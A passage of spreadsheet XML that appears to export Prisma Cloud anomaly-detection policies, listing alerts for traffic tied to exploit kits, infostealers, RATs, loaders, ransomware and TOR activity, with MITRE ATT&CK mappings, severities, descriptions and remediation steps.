      <c r="AE1522" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1522" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>69c707bb-9f42-4501-b403-013e84be5f99</t>
        </is>
      </c>
      <c r="AI1522" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1522" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1522" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1523">
      <c r="A1523"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23" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1523" s="2" t="inlineStr"/>
      <c r="D1523" t="inlineStr"/>
      <c r="E1523" t="inlineStr"/>
      <c r="F1523" t="inlineStr"/>
      <c r="G1523" t="b">
        <v>1</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1523" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1523" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Exploit Kit activity</t>
        </is>
      </c>
      <c r="L1523" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1523" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1523" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1523" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1523" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1523" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1523" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1523" t="inlineStr">
        <is>
          <t>Attack Path Rule,AutoFocus Threat,Execution,Exfiltration</t>
        </is>
      </c>
      <c r="T1523" t="b">
        <v>0</v>
      </c>
      <c r="U1523" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1523" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1523" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (exploit kit).
        An exploit kit is a utility program that attackers use to launch exploits against vulnerable applications. Usually done on a mass scale, exploit kits are often leveraged to distribute additional malware. Exploit kits are commonly packaged with exploits that target commonly installed software like Adobe Flash and Java.</t>
        </is>
      </c>
      <c r="X1523"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23" t="inlineStr"/>
      <c r="Z1523" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1523" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1523" t="inlineStr">
        <is>
          <t>2023-08-04 06:09:47</t>
        </is>
      </c>
      <c r="AC1523" t="inlineStr"/>
      <c r="AD1523" t="b">
        <v>1</v>
      </c>
      <c r="AE1523" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1523" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>e8613023-5d80-49e4-808a-2fff076b70d9</t>
        </is>
      </c>
      <c r="AI1523" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1523" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1523" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1524">
      <c r="A1524"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24" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1524" s="2" t="inlineStr"/>
      <c r="D1524" t="inlineStr"/>
      <c r="E1524" t="inlineStr"/>
      <c r="F1524" t="inlineStr"/>
      <c r="G1524" t="b">
        <v>1</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1524" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1524" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with InfoStealer activity</t>
        </is>
      </c>
      <c r="L1524" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1524" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1524" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1524" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1524" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1524" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1524" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1524" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,Attack Path Rule,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1524" t="b">
        <v>0</v>
      </c>
      <c r="U1524" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1524" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1524" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (infostealer).
        Infostealers are malicious software programs that gather confidential information from the compromised computer to send it to a predetermined location. This can include information related to the compromised computer, financial data, or user credentials for various web sites.</t>
        </is>
      </c>
      <c r="X1524"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24" t="inlineStr"/>
      <c r="Z1524" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1524" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1524" t="inlineStr">
        <is>
          <t>2023-07-20 17:24:51</t>
        </is>
      </c>
      <c r="AC1524" t="inlineStr"/>
      <c r="AD1524" t="b">
        <v>1</v>
      </c>
      <c r="AE1524" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1524" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>5d991422-598f-4bcf-9a00-8670ca0d0b2e</t>
        </is>
      </c>
      <c r="AI1524" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1524" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1524" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1525">
      <c r="A1525"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25" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1525" s="2" t="inlineStr"/>
      <c r="D1525" t="inlineStr"/>
      <c r="E1525" t="inlineStr"/>
      <c r="F1525" t="inlineStr"/>
      <c r="G1525" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1525" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1525" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with DDoS activity</t>
        </is>
      </c>
      <c r="L1525" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1525" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1525" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1525" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1525" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1525" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1525" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1525" t="inlineStr">
        <is>
          <t>Initial Access,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1525" t="b">
        <v>0</v>
      </c>
      <c r="U1525" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1525" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1525" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (DDoS malware), is connecting to one of your cloud hosts.
        DDoS malware refers to programs that contains denial of service capabilities or can become part of a network of machines to launch a distributed attack.</t>
        </is>
      </c>
      <c r="X1525"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25" t="inlineStr"/>
      <c r="Z1525" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1525" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1525" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1525" t="inlineStr"/>
      <c r="AD1525" t="b">
        <v>1</v>
      </c>
      <c r="AE1525" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1525" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>d6efb1b5-8be9-4511-a62f-15aa45bcffc3</t>
        </is>
      </c>
      <c r="AI1525" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1525" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1525" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1526">
      <c r="A1526"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26" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1526" s="2" t="inlineStr"/>
      <c r="D1526" t="inlineStr"/>
      <c r="E1526" t="inlineStr"/>
      <c r="F1526" t="inlineStr"/>
      <c r="G1526" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1526" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1526" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Remote Access Trojan activity</t>
        </is>
      </c>
      <c r="L1526" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1526" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1526" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1526" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1526" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1526" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1526" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1526" t="inlineStr">
        <is>
          <t>Initial Access,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1526" t="b">
        <v>0</v>
      </c>
      <c r="U1526" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1526" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1526" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (remote access trojan), is connecting to one of your cloud hosts.
        Remote Access Trojans (RAT) are programs that provide the capability to allow covert surveillance or the ability to gain unauthorized access to a victim machine. Often packaged to imitate legitimate applications, RATs can mimic the behavior of keylogger applications by allowing the automated collection of data, such as keystrokes, usernames, passwords, screenshots, browser history, emails, and chat logs.</t>
        </is>
      </c>
      <c r="X1526"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26" t="inlineStr"/>
      <c r="Z1526" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1526" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1526" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1526" t="inlineStr"/>
      <c r="AD1526" t="b">
        <v>1</v>
      </c>
      <c r="AE1526" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1526" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>66763bc8-e68e-47e2-b684-7dffb70d0c91</t>
        </is>
      </c>
      <c r="AI1526" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1526" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1526" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1527">
      <c r="A1527"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27" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1527" s="2" t="inlineStr"/>
      <c r="D1527" t="inlineStr"/>
      <c r="E1527" t="inlineStr"/>
      <c r="F1527" t="inlineStr"/>
      <c r="G1527" t="b">
        <v>1</v>
      </c>
      <c r="H15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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1527" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1527" t="inlineStr">
        <is>
          <t>Traffic from a suspicious IP address associated with Loader activity</t>
        </is>
      </c>
      <c r="L1527" t="inlineStr">
        <is>
          <t>INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1527" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1527" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1527" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1527" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1527" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1527" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1527" t="inlineStr">
        <is>
          <t>Initial Access,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1527" t="b">
        <v>0</v>
      </c>
      <c r="U1527" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1527" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1527" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted inbound traffic to your cloud environment. A host outside your environment with an IP address previously associated by AutoFocus to malicious activity (loader), is connecting to one of your cloud hosts.
        Loaders retrieve malicious executables or payloads from an attacker-controlled server.</t>
        </is>
      </c>
      <c r="X1527" t="inlineStr">
        <is>
          <t>1. Review the source address and target port in the alert to determine if network restrictions can be implemented to prevent traffic from suspicious sources.
2. Evaluate and fix any violating policy associated with the target (internal) host in the alert, as reported by Prisma Cloud.</t>
        </is>
      </c>
      <c r="Y1527" t="inlineStr"/>
      <c r="Z1527" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1527" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1527" t="inlineStr">
        <is>
          <t>2023-03-17 04:14:05</t>
        </is>
      </c>
      <c r="AC1527" t="inlineStr"/>
      <c r="AD1527" t="b">
        <v>1</v>
      </c>
      <c r="AE1527" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1527" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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7" t="inlineStr">
        <is>
          <t>2106b811-90bb-4427-a954-0df96de66795</t>
        </is>
      </c>
      <c r="AI1527" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1527" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1527" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1528">
      <c r="A1528" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated]</t>
        </is>
      </c>
      <c r="B1528" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1528" s="2" t="inlineStr"/>
      <c r="D1528" t="inlineStr"/>
      <c r="E1528" t="inlineStr"/>
      <c r="F1528" t="inlineStr"/>
      <c r="G1528" t="b">
        <v>1</v>
      </c>
      <c r="H15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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1528" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="K1528" t="inlineStr">
        <is>
          <t>Traffic to a suspicious IP address associated with Ransomware activity</t>
        </is>
      </c>
      <c r="L1528" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M1528" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1528" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1528" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1528" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="Q1528" t="inlineStr">
        <is>
          <t>TA0010</t>
        </is>
      </c>
      <c r="R1528" t="inlineStr">
        <is>
          <t>T1537 - Transfer Data to Cloud Account (TA0010)</t>
        </is>
      </c>
      <c r="S1528" t="inlineStr">
        <is>
          <t>Exfiltration,Execution,Attack Path Rule,AutoFocus Threat</t>
        </is>
      </c>
      <c r="T1528" t="b">
        <v>0</v>
      </c>
      <c r="U1528" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1528" t="inlineStr">
        <is>
          <t>anomaly_network</t>
        </is>
      </c>
      <c r="W1528" t="inlineStr">
        <is>
          <t>Identifies suspicious connections by inspecting the accepted outbound traffic of your cloud environment. A cloud instance inside your environment communicated with an external host, whose IP address has been associated by AutoFocus to malicious activity (ransomware).
        Ransomware is a type of malware that prevents users from accessing their system or personal files and demands ransom payment in order to regain access.</t>
        </is>
      </c>
      <c r="X1528" t="inlineStr">
        <is>
          <t>1. The source (internal) host in the alert should be examined to determine if it is compromised. A connection to a suspicious host, as shown by the alert, could be an indication of a security breach.
2. Search the cloud logs for any communication to the external host, which might have occurred before the external address was flagged by AutoFocus.
3. Review the source address and target port in the alert to determine if network restrictions can be implemented to prevent traffic from suspicious sources.
4. Evaluate and fix any violating policy associated with the source (internal) host in the alert, as reported by Prisma Cloud.</t>
        </is>
      </c>
      <c r="Y1528" t="inlineStr"/>
      <c r="Z1528" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AA1528" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1528" t="inlineStr">
        <is>
          <t>2023-07-20 17:33:22</t>
        </is>
      </c>
      <c r="AC1528" t="inlineStr"/>
      <c r="AD1528" t="b">
        <v>1</v>
      </c>
      <c r="AE1528" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1528" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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8" t="inlineStr">
        <is>
          <t>29d57730-d33e-45d3-a837-a86ac56806fa</t>
        </is>
      </c>
      <c r="AI1528" t="inlineStr">
        <is>
          <t>network_anomaly</t>
        </is>
      </c>
      <c r="AJ1528" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1528" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1529">
      <c r="A1529" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], Matt's ATT&amp;ACK, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Matt's ATT&amp;ACK, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B1529" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1529" s="2" t="inlineStr"/>
      <c r="D1529" t="n">
        <v>0</v>
      </c>
      <c r="E1529" t="n">
        <v>14</v>
      </c>
      <c r="F1529" t="n">
        <v>52</v>
      </c>
      <c r="G1529" t="b">
        <v>1</v>
      </c>
      <c r="H15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29" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1529" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="K1529" t="inlineStr">
        <is>
          <t>Unusual user activity</t>
        </is>
      </c>
      <c r="L1529" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M1529" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1529" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1529" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1529" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1529" t="inlineStr">
        <is>
          <t>TA0001</t>
        </is>
      </c>
      <c r="R1529" t="inlineStr">
        <is>
          <t>T1078.004 - Valid Accounts: Cloud Accounts (TA0001)</t>
        </is>
      </c>
      <c r="S1529" t="inlineStr">
        <is>
          <t>Attack Path Rule,Privilege Escalation,Unauthorized Access</t>
        </is>
      </c>
      <c r="T1529" t="b">
        <v>0</v>
      </c>
      <c r="U1529" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1529" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1529" t="inlineStr">
        <is>
          <t>Detects both insider threats and account compromise through advanced data science. Prisma Cloud machine learning algorithm profiles user’s activities consisting of the service access locations and/or the cloud services accessed during the training period. Any deviation from the baseline is flagged as an anomalous activity that should be investigated further by the security teams. This policy uses write events.</t>
        </is>
      </c>
      <c r="X1529" t="inlineStr">
        <is>
          <t>1. Leverage Prisma Cloud user behavior analytics visualization on the Prisma Cloud platform to understand the all the details related to this alert.
2. If it is determined through further investigation that the activity originated from a malicious insider or outsider, disable the user account until further investigation is done.</t>
        </is>
      </c>
      <c r="Y1529" t="inlineStr"/>
      <c r="Z1529" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AA1529" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1529" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1529" t="inlineStr"/>
      <c r="AD1529" t="b">
        <v>1</v>
      </c>
      <c r="AE1529" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1529" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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29" t="inlineStr">
        <is>
          <t>e12e1edc-3018-11e7-93ae-92361f002671</t>
        </is>
      </c>
      <c r="AI1529" t="inlineStr">
        <is>
          <t>uba_anomaly</t>
        </is>
      </c>
      <c r="AJ1529" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1529" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1530">
      <c r="A1530"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0" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1530" s="2" t="inlineStr"/>
      <c r="D1530" t="inlineStr"/>
      <c r="E1530" t="inlineStr"/>
      <c r="F1530" t="inlineStr"/>
      <c r="G1530" t="b">
        <v>1</v>
      </c>
      <c r="H15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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1530" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1530" t="inlineStr">
        <is>
          <t>Suspicious activity in Database services</t>
        </is>
      </c>
      <c r="L1530" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1530" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1530" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1530" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1530" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1530" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1530" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1530" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1530" t="b">
        <v>0</v>
      </c>
      <c r="U1530" t="inlineStr">
        <is>
          <t>behavioral</t>
        </is>
      </c>
      <c r="V1530" t="inlineStr">
        <is>
          <t>anomaly_ueba</t>
        </is>
      </c>
      <c r="W1530" t="inlineStr">
        <is>
          <t>Detects suspicious activity originating from TOR anonymity network to access resources related to database that could lead to potentially malicious activities from the user. This policy uses security critical write events.</t>
        </is>
      </c>
      <c r="X1530"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0" t="inlineStr"/>
      <c r="Z1530" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AA1530" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1530" t="inlineStr">
        <is>
          <t>2022-10-14 05:42:53</t>
        </is>
      </c>
      <c r="AC1530" t="inlineStr"/>
      <c r="AD1530" t="b">
        <v>1</v>
      </c>
      <c r="AE1530" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1530" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG15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0" t="inlineStr">
        <is>
          <t>cd4fe5a0-2eb3-4308-b96c-faad36f52541</t>
        </is>
      </c>
      <c r="AI1530" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="AJ1530" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1530" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1531">
      <c r="A1531"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1" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1531" s="2" t="inlineStr"/>
      <c r="D1531" t="inlineStr"/>
      <c r="E1531" t="inlineStr"/>
      <c r="F1531" t="inlineStr"/>
      <c r="G1531" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1531" t="inlineStr">
        <is>
          <t>event_tor_anomaly</t>
        </is>
      </c>
      <c r="K1531" t="inlineStr">
        <is>
          <t>Suspicious activity in Containers services</t>
        </is>
      </c>
      <c r="L1531" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M1531" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1531" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1531" t="inlineStr">
        <is>
          <t>anomaly</t>
        </is>
      </c>
      <c r="P1531" t="inlineStr">
        <is>
          <t>ueba</t>
        </is>
      </c>
      <c r="Q1531" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1531" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1531" t="inlineStr">
        <is>
          <t>Defense Evasion,Impact,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1531" t="b">
        <v>0</v>
      </c>
